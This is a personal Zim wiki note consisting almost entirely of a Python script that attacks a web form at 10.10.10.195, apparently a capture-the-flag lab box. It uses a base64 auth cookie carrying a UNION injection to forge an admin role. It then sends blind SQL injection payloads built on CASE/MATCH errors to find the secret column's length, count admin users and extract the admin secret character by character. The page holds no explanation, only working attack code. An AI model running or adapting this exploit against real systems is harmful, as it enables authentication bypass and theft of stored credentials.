Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-07-22T04:27:24-04:00

====== example ======

**Created Wednesday 22 July 2020**

**import requests**
**import string**

**URL = "http://10.10.10.195/submitmessage"**
**COOKIE = { "auth" : "dXNlcm5hbWU6Z3Vlc3Q7c2VjcmV0PXh5eicgdW5pb24gYWxsIHNlbGVjdCAxIGFzIHJvbGUgZnJvbSB1c2VycyB3aGVyZSB1c2VybmFtZSA9ICdndWVzdA==" }**
**#what we know about the tables:**
**#table: users**
**#columns: username, secret, role**
**#table: messages**

**#get_secret_length = 1**
**#secret_length = 64**
**#secret_length = 0**
**#get_number_of_admins = 1**
**#get_admin_secret = 1**


**def send(payload):**
**    return requests.post(URL, data = { "message" : payload }, cookies = COOKIE).text**

**def get_secret_length():**
**    secret_length = 0**
**    for i in range(128):**
**        payload = "' AND (SELECT CASE WHEN ((SELECT length(secret) FROM users LIMIT 1) = "+str(i)+") THEN 1 ELSE MATCH(1,1) END))--"**
**        #resp = requests.post(URL, data = { "message" : payload }, cookies = COOKIE)**
**        if not "unable" in send(payload):**
**            #print("secret length is: " + str(i))**
**            secret_length = i**
**            break**
**    return secret_length**

**secret_length = get_secret_length()**
**print("secret lenght is: {}".format(secret_length))**

**#secret_length = 64**

**#find out how many have user role = 1 = admin**
**def get_number_of_admins():**
**    number_of_admins = 0**
**    for i in range(128):**
**        payload = "' AND (SELECT CASE WHEN ((SELECT count(username) FROM users WHERE role=1) = "+str(i)+") THEN 1 ELSE MATCH(1,1) END))--"**
**        if not "unable" in send(payload):**
**            number_of_admins = i**
**    return number_of_admins**

**#print("number of admin users (role=1): " + str(get_number_of_admins()))**

**#get the admins secret**
**def get_admin_secret(log = False):**
**    admin_secret = ""**
**    #print("getting the admin secret:")**
**    for i in range(secret_length):**
**        for c in string.printable:**
**            payload = "' AND (SELECT CASE WHEN ((SELECT hex(substr(secret,"+str(i+1)+",1)) FROM users WHERE role=1) = hex('"+str(c)+"')) THEN 1 ELSE MATCH(1,1) END))--"**
**            if not "unable" in send(payload):**
**                admin_secret += c**
**                if log:**
**                    print(c, sep=" ", end="", flush=True)**
**                break**
**                if log:**
**                    print("\n")**
**    return admin_secret**

**print("getting the admin secret:")**
**#print("admin secret: {}".format(get_admin_secret()))**
**get_admin_secret(True)**
